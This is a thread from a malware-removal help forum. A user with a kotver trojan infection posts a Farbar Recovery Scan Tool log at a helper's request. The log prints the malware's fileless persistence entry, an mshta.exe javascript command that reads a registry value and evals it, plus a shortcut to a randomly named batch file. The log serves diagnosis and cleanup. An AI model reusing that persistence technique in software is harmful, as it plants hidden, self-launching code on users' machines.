trojan.kotver!gm2

Virus Spyware Malware

  • This topic is locked

#1
[email protected]

    Member

  • 18 posts

I'm infected with the trojan.kotver!gm2, which my Norton will not fix. Files from run of Farbar attached.



#2
zep516

    Trusted Helper

  • Malware Removal
  • 6,811 posts
Hi! My name is zep516 and welcome to Geekstogo!
I'll do the best I can to resolve your computer issue.
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue. Stop and ask! Never be afraid to ask questions! :)

Please try and paste the 2 log files, Frst.txt and additions.txt, into your next reply. I do not see the logs above.

Thanks
Joe :)

#3
[email protected]

    Member

  • Topic Starter
  • 18 posts

One of Two

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-08-2016
Ran by JHS-JJS (30-08-2016 10:44:59)
Running from C:\Users\JHS-JJS\Desktop
Windows Vista ™ Home Premium Service Pack 2 (X64) (2008-09-22 09:59:53)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1231050607-2223395895-1768608861-500 - Administrator - Disabled)
Guest (S-1-5-21-1231050607-2223395895-1768608861-501 - Limited - Enabled)
JHS-JJS (S-1-5-21-1231050607-2223395895-1768608861-1000 - Administrator - Enabled) => C:\Users\JHS-JJS

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security Suite (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security Suite (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security Suite (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AAC Decoder (HKLM-x32\...\{AEF9DC35ADDF4825B049ACBFD1C6EB37}) (Version: 7.1.0 - DivX, Inc.)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Shockwave Player (HKLM-x32\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)
AIM 7 (HKLM-x32\...\AIM_7) (Version:  - )
Akamai NetSession Interface (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
AOL Instant Messenger (HKLM-x32\...\AOL Instant Messenger) (Version:  - )
AOL Mail and AIM Gadget (HKLM-x32\...\{F226C1DA-66D7-4ABC-86B5-3F978A660EBF}) (Version: 1.0.0 - AOL LLC)
AOL Toolbar (HKLM-x32\...\AOL Toolbar) (Version:  - AOL Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version:  - AOL Inc.)
Apple Application Support (HKLM-x32\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Audacity 2.0.2 (HKLM-x32\...\Audacity_is1) (Version: 2.0.2 - Audacity Team)
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.1 - )
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Canon IJ Network Scan Utility (HKLM-x32\...\Canon_IJ_Network_Scan_UTILITY) (Version:  - )
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version:  - )
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version:  - )
Canon MP Navigator EX 1.1 (HKLM-x32\...\MP Navigator EX 1.1) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM-x32\...\MP Navigator EX 3.1) (Version:  - )
Canon MX850 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX850_series) (Version:  - )
Canon MX850 series User Registration (HKLM-x32\...\Canon MX850 series User Registration) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon MX870 series User Registration (HKLM-x32\...\Canon MX870 series User Registration) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CDDRV_Installer (Version: 4.60 - Logitech) Hidden
Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.3.11006.1 - Cisco Consumer Products LLC)
Comcast Access (HKLM-x32\...\com.comcast.access.13A1FA90F0FC9DC009FB0956ADD0F13F8608561B.1) (Version: ComcastAccess-1.59 - Comcast Cable Communications Management LLC)
Comcast Access (x32 Version: 1.59 - Comcast Cable Communications Management LLC) Hidden
Conexant D850 PCI V.92 Modem (HKLM\...\CNXT_MODEM_PCI_HSF) (Version: 7.74.00 - Conexant)
Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Video Chat (remove only) (HKLM-x32\...\Dell Video Chat) (Version: 6.0 (6534) - SightSpeed Inc.)
Dell-eBay (HKLM-x32\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DivX Codec (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 6.8.5 - DivX, Inc.)
DivX Converter (HKLM-x32\...\{13F3917B56CD4C25848BDC69916971BB}) (Version: 7.0.0 - DivX, Inc.)
DivX Converter (HKLM-x32\...\{B13A7C41581B411290FBC0395694E2A9}) (Version: 7.0.0 - DivX, Inc.)
DivX Player (HKLM-x32\...\{8ADFC4160D694100B5B8A22DE9DCABD9}) (Version: 7.0.0 - DivX, Inc.)
DivX Plus DirectShow Filters (HKLM-x32\...\DivX Plus DirectShow Filters) (Version:  - DivX, Inc.)
DivX Version Checker (HKLM-x32\...\{3FC7CBBC4C1E11DCA1A752EA55D89593}) (Version: 7.0.0.19 - DivX, Inc.)
DivX Web Player (HKLM-x32\...\{B7050CBDB2504B34BC2A9CA0A692CC29}) (Version: 1.4.2 - DivX,Inc.)
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version:  - AOL Inc.) <==== ATTENTION
EDocs (HKLM-x32\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
erLT (x32 Version: 1.20.0137 - Logitech, Inc.) Hidden
Feedback Tool (HKLM-x32\...\{90024193-9F13-4877-89D5-A1CDF0CBBF28}) (Version: 1.1.0 - Microsoft Corporation)
Female Voice Pack (HKLM-x32\...\{71F8C486-8A13-468E-8B73-06051075556A}) (Version: 3.3.1 - Screaming Bee)
File Opener Pro (HKLM-x32\...\fileopenerpro) (Version:  - FileOpenerPro) <==== ATTENTION
Garmin City Navigator North America NT 2010.20 (HKLM-x32\...\{C2E8B236-7554-45FE-92C0-94EF76E4D182}) (Version: 13.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin Communicator Plugin (HKLM-x32\...\{A7DEBAA4-B211-4D1A-A6B3-E52BFAAA1D0C}) (Version: 2.7.3 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
GIMP 2.6.11 (HKLM-x32\...\WinGimp-2.0_is1) (Version: 2.6.11 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Talk (remove only) (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
H.264 Decoder (HKLM-x32\...\{A96E97134CA649888820BCDE5E300BBD}) (Version: 1.0.0 - DivX, Inc.)
InstallIQ Updater (HKLM-x32\...\{8E1CB0F1-67BF-4052-AA23-FA22E94804C1}) (Version: 1.4.3.0 - W3i, LLC)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
KhalInstallWrapper (Version: 2.00.0000 - Logitech) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Logitech SetPoint (HKLM-x32\...\{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}) (Version: 4.80 - Logitech)
Meter Drivers for OneTouch® Software (x32 Version: 1.7.0 - LifeScan) Hidden
Meter Drivers for OneTouch® Software v1.7.0 (HKLM-x32\...\InstallShield_{B18C4F32-5CDD-4357-8523-85659CFCF2A0}) (Version: 1.7.0 - LifeScan)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{90110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Picture It! Express 7.0 (HKLM-x32\...\{369B36BE-3D64-4641-9AEA-808D436FE130}) (Version: 7.0.0.0000 - Microsoft Corporation)
Microsoft Report Viewer Redistributable 2008 (KB971118) (HKLM-x32\...\Microsoft Report Viewer Redistributable 2008 (KB971118)) (Version:  - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MKV Splitter (HKLM-x32\...\{AAC389499AEF40428987B3D30CFC76C9}) (Version: 1.0.0 - DivX, Inc.)
Modem Diagnostic Tool (HKLM\...\{1C89932F-1D9D-4776-AD7A-9156FF792539}) (Version: 1.0.17.8 - Dell)
MorphVOX Pro (HKLM-x32\...\{D1E01FCE-5C90-402B-BB4E-B73EC6F85328}) (Version: 4.3.8 - Screaming Bee)
Move Media Player (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Move Media Player) (Version:  - Move Networks)
Mozilla Firefox 43.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.1 (x86 en-US)) (Version: 43.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.1 - Mozilla)
MSXML 4.0 SP2 (KB936181) (HKLM-x32\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Msxml4 for LDCF (HKLM-x32\...\{D6160F37-7638-4E56-9774-F3C88F30A4A9}) (Version: 1.0.0.0 - )
NetWaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.53 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 22.7.1.32 - Symantec Corporation)
ODF Add-in for Microsoft Office (HKLM-x32\...\{2BC21CD2-8053-406A-80F6-9AB61717B49D}) (Version: 4.0.5309.0 - OpenXML/ODF Translator Team)
OneTouch Software (HKLM-x32\...\{F2A056D9-54B2-4F2B-8DD8-A42A73D1E5E7}) (Version:  - )
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Personality Voices (HKLM-x32\...\{29C042AB-059B-414C-840E-94775E3F24A8}) (Version: 1.0.0 - Screaming Bee)
PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.00.000 - Prolific Technology INC)
PL-2303 Vista Driver Installer (HKLM-x32\...\{EEC010D0-1252-4E1D-BAD9-F1B8F414535C}) (Version: 3.0.1.0 - Prolific)
PowerDVD (HKLM-x32\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! PageManager 7.15.20 (HKLM-x32\...\{D2D6B9EB-C6DC-4DAA-B4DE-BB7D9735E7DA}) (Version: 7.15.20 - NewSoft Technology Corporation)
Prodigy Diabetes Management Software Version 2.4 win7 (HKLM-x32\...\{A9FA2103-D1C8-4D80-A2AE-BE5B5388CE43}) (Version: 2.4 - Prodigy Diabetes Care LLC)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM-x32\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - Realtek Semiconductor Corp.)
Roxio Creator DE (HKLM-x32\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
RTC Client API v1.2 (HKLM-x32\...\{44CDBD1B-89FB-4E02-8319-2A4C550F664A}) (Version: 1.2.0000 - Microsoft)
ScanSoft OmniPage SE 4 (HKLM-x32\...\{FE893E2C-11B4-47CB-88F6-6647D90C6A13}) (Version: 15.2.0020 - Nuance Communications, Inc.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Symantec Technical Support Web Controls (HKLM-x32\...\{20C53FA2-4307-4671-A93F-9463B29DFCF1}) (Version: 3.5.3 - Symantec Corporation)
Uninstall AOL Emergency Connect Utility 1.0 (HKLM-x32\...\AOL Emergency Connect Utility 1.0) (Version:  - )
Unity Web Player (HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
USB Video Driver (HKLM-x32\...\{2758691A-2CDE-4942-A4AC-0E8F61FE2067}) (Version: 1.00 - EETI)
Windows Driver Package - eMPIA Technology Inc, (emAudio) MEDIA  (08/31/2007 5.7.0831.0) (HKLM\...\1B8C0FE57993F0D33DD0A689D44B5B3D8954B0F7) (Version: 08/31/2007 5.7.0831.0 - eMPIA Technology Inc,)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Xilisoft PowerPoint to Video Converter Free (HKLM-x32\...\Xilisoft PowerPoint to Video Converter Free) (Version: 1.1.1.20120601 - Xilisoft)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {199C1A68-D14F-42C8-92ED-08231530F0D0} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\WSCStub.exe [2016-08-16] (Symantec Corporation)
Task: {1BB1662A-F883-4999-B10B-34B680B2032B} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\SymErr.exe [2016-05-23] (Symantec Corporation)
Task: {2925079F-98DD-4453-AA11-DA5E745A6C64} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security Suite\Upgrade.exe [2016-08-16] (Symantec Corporation)
Task: {2D65E116-BC2D-40F7-8DEC-F995E0A2F480} - System32\Tasks\{AEB3560F-FEA4-4B1B-A229-C629B89FB2EF} => pcalua.exe -a C:\Users\JHS-JJS\Desktop\epson12578.exe -d C:\epson\epson11889_easyprint_310a
Task: {54D1D4F4-5D3C-4CAB-BC82-EF018B19B497} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {6A11ED75-4E12-4A9A-B419-BB346B8351CF} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files (x86)\Realtek\RTNICDiag\RTNICDiag.exe [2008-07-21] (Realtek)
Task: {B1A8D429-0D8C-4CD8-A6CD-A3E83B1EE0CB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C0044E95-1977-45B0-9B7B-69DCF08A7E50} - System32\Tasks\{6D7B84B1-EB05-439D-B85E-D3E8034E6F8A} => pcalua.exe -a "C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYOC2QJR\epson12578[1].exe" -d C:\epson\epson11889_easyprint_310a
Task: {C3D8CD03-979C-4EF9-81EE-5E3421856239} - System32\Tasks\{7FA9A828-22F3-460F-A1B2-95415F2B2CED} => pcalua.exe -a "C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z3Z64ST2\uninstall_flash_player[1].exe" -d C:\Users\JHS-JJS\Desktop
Task: {DAFB9A93-E033-4139-9F96-32DDA0777E80} - System32\Tasks\PDVDDXSrv.exe_1027380385 => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [2008-05-23] (CyberLink Corp.)
Task: {E35F71AF-20F9-42F8-8344-5ABC853C19C8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {E9D084FD-53F3-4C0F-9521-918E42973369} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\SymErr.exe [2016-05-23] (Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files (x86)\Realtek\RTNICDiag\RTNICDiag.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk -> C:\Users\JHS-JJS\AppData\Local\b263cb\d9bd8b.bat ()
Shortcut: C:\Users\JHS-JJS\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.com

==================== Loaded Modules (Whitelisted) ==============

2012-11-29 18:40 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2010-09-28 21:13 - 2011-04-20 01:21 - 00045056 _____ () C:\Windows\system32\atitmp64.dll
2008-11-06 17:05 - 2006-09-20 09:35 - 00020480 _____ () C:\Windows\System32\spool\drivers\x64\3\WrtMon.exe
2010-08-20 10:16 - 2009-07-20 12:35 - 00018960 _____ () C:\Program Files\Logitech\SetPoint\khalwrapper.dll
2008-11-06 17:05 - 2006-10-30 17:59 - 00024576 _____ () C:\Windows\System32\spool\drivers\x64\3\WrtProc.exe
2010-08-20 10:16 - 2009-07-20 04:00 - 00077824 _____ () C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36: "C:\Windows\system32\mshta.exe" "javascript:JuJWx1="H";J1I8=new ActiveXObject("WScript.Shell");O9xZdAbO="msF";D8dwB=J1I8.RegRead("HKCU\\software\\tipm\\igbespedi");Nzqpd2a="y2v1QG";eval(D8dwB);PFf8KK2H="ovZ";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 08:34 - 2006-09-18 17:37 - 00000736 ____N C:\Windows\system32\Drivers\etc\hosts

::1             localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\JHS-JJS\Pictures\814Bafter.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: gusvc => 3

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
